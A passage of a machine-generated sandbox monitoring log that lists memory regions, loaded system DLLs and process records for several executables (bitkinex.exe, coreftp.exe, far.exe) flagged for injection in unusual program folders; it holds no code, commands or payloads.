0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2881 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2882 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2883 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2885 start_va = 0x8e0000 end_va = 0xa33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008e0000" filename = "" Thread: id = 166 os_tid = 0xbe0 Process: id = "16" image_name = "bitkinex.exe" filename = "c:\\program files (x86)\\internet explorer\\bitkinex.exe" page_root = "0x4f1c0000" os_pid = "0xbe4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files (x86)\\Internet Explorer\\bitkinex.exe\" " cur_dir = "C:\\Program Files (x86)\\Internet Explorer\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2886 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2887 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2888 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2889 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2890 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2891 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2892 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2893 start_va = 0x140000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 2894 start_va = 0x250000 end_va = 0x34ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 2895 start_va = 0x3b0000 end_va = 0x42ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 2896 start_va = 0x490000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 2897 start_va = 0x590000 end_va = 0x717fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 2898 start_va = 0x720000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 2899 start_va = 0x7e0000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 2900 start_va = 0x850000 end_va = 0x866fff monitored = 0 entry_point = 0x8514a1 region_type = mapped_file name = "bitkinex.exe" filename = "\\Program Files (x86)\\Internet Explorer\\bitkinex.exe" (normalized: "c:\\program files (x86)\\internet explorer\\bitkinex.exe") Region: id = 2901 start_va = 0x870000 end_va = 0x9f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 2902 start_va = 0xa00000 end_va = 0x1dfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 2903 start_va = 0x1e00000 end_va = 0x1edefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e00000" filename = "" Region: id = 2904 start_va = 0x1ee0000 end_va = 0x28a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ee0000" filename = "" Region: id = 2905 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2906 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2907 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2908 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2909 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2910 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2911 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2912 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2913 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2914 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2915 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2916 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2917 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2918 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2919 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2920 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2921 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2922 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2923 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2924 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 2925 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 2926 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2927 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2928 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2929 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2930 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2931 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2932 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2933 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2934 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2935 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2936 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2938 start_va = 0x28b0000 end_va = 0x2997fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028b0000" filename = "" Thread: id = 167 os_tid = 0xbe8 Process: id = "17" image_name = "coreftp.exe" filename = "c:\\program files\\msbuild\\coreftp.exe" page_root = "0x4dec6000" os_pid = "0xbec" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files\\MSBuild\\coreftp.exe\" " cur_dir = "C:\\Program Files\\MSBuild\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2939 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2940 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2941 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2942 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2943 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2944 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2945 start_va = 0x90000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 2946 start_va = 0xc0000 end_va = 0xfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 2947 start_va = 0x100000 end_va = 0x166fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2948 start_va = 0x190000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 2949 start_va = 0x230000 end_va = 0x32ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 2950 start_va = 0x330000 end_va = 0x4b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 2951 start_va = 0x4e0000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 2952 start_va = 0x560000 end_va = 0x6e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 2953 start_va = 0x710000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 2954 start_va = 0x810000 end_va = 0x8eefff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 2955 start_va = 0x1200000 end_va = 0x1216fff monitored = 0 entry_point = 0x12014a1 region_type = mapped_file name = "coreftp.exe" filename = "\\Program Files\\MSBuild\\coreftp.exe" (normalized: "c:\\program files\\msbuild\\coreftp.exe") Region: id = 2956 start_va = 0x1220000 end_va = 0x261ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Region: id = 2957 start_va = 0x2620000 end_va = 0x2fe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002620000" filename = "" Region: id = 2958 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2959 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2960 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2961 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2962 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2963 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2964 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2965 start_va = 0x75410000 end_va = 0x7546ffff monitored = 0 entry_point = 0x7542a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2966 start_va = 0x76270000 end_va = 0x762fffff monitored = 0 entry_point = 0x76286343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2967 start_va = 0x76300000 end_va = 0x7639cfff monitored = 0 entry_point = 0x76333fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2968 start_va = 0x766d0000 end_va = 0x767cffff monitored = 0 entry_point = 0x766eb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2969 start_va = 0x769e0000 end_va = 0x76acffff monitored = 0 entry_point = 0x769f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2970 start_va = 0x76b90000 end_va = 0x76c3bfff monitored = 0 entry_point = 0x76b9a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2971 start_va = 0x77050000 end_va = 0x7711bfff monitored = 0 entry_point = 0x7705168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2972 start_va = 0x77180000 end_va = 0x7721ffff monitored = 0 entry_point = 0x771949e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2973 start_va = 0x772b0000 end_va = 0x773bffff monitored = 0 entry_point = 0x772c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2974 start_va = 0x773e0000 end_va = 0x77426fff monitored = 0 entry_point = 0x773e74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2975 start_va = 0x77430000 end_va = 0x7748ffff monitored = 0 entry_point = 0x7744158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2976 start_va = 0x77490000 end_va = 0x774a8fff monitored = 0 entry_point = 0x77494975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2977 start_va = 0x774c0000 end_va = 0x775defff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000774c0000" filename = "" Region: id = 2978 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 2979 start_va = 0x776e0000 end_va = 0x77888fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2980 start_va = 0x77890000 end_va = 0x77899fff monitored = 0 entry_point = 0x778936a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2981 start_va = 0x778c0000 end_va = 0x77a3ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2982 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2983 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2984 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2985 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2986 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2987 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2988 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2989 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2991 start_va = 0x8f0000 end_va = 0xa67fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Thread: id = 168 os_tid = 0xbf0 Process: id = "18" image_name = "far.exe" filename = "c:\\program files (x86)\\windows media player\\far.exe" page_root = "0x4ebcc000" os_pid = "0xbf4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "8" os_parent_pid = "0x45c" cmd_line = "\"C:\\Program Files (x86)\\Windows Media Player\\far.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Media Player\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2992 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2993 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2994 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2995 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2996 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2997 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2998 start_va = 0xd0000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 2999 start_va = 0x150000 end_va = 0x1b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3000 start_va = 0x1e0000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 3001 start_va = 0x250000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 3002 start_va = 0x350000 end_va = 0x366fff monitored = 0 entry_point = 0x3514a1 region_type = mapped_file name = "far.exe" filename = "\\Program Files (x86)\\Windows Media Player\\far.exe" (normalized: "c:\\program files (x86)\\windows media player\\far.exe") Region: id = 3003 start_va = 0x370000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 3004 start_va = 0x460000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 3005 start_va = 0x5c0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 3006 start_va = 0x7f0000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 3007 start_va = 0x800000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 3008 start_va = 0x990000 end_va = 0xb10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 3009 start_va = 0xb20000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 3010 start_va = 0x1f20000 end_va = 0x28e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f20000" filename = "" Region: id = 3011 start_va = 0x73430000 end_va = 0x73432fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 3012 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3013 start_va = 0x74320000 end_va = 0x7439ffff monitored = 0 entry_point = 0x743337c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3014 start_va = 0x75130000 end_va = 0x75137fff monitored = 0 entry_point = 0x751320f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3015 start_va = 0x75140000 end_va = 0x7519bfff monitored = 0 entry_point = 0x7517f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3016 start_va = 0x751a0000 end_va = 0x751defff monitored = 0 entry_point = 0x751ce088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3017 start_va = 0x75400000 end_va = 0x7540bfff monitored = 0 entry_point = 0x754010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id 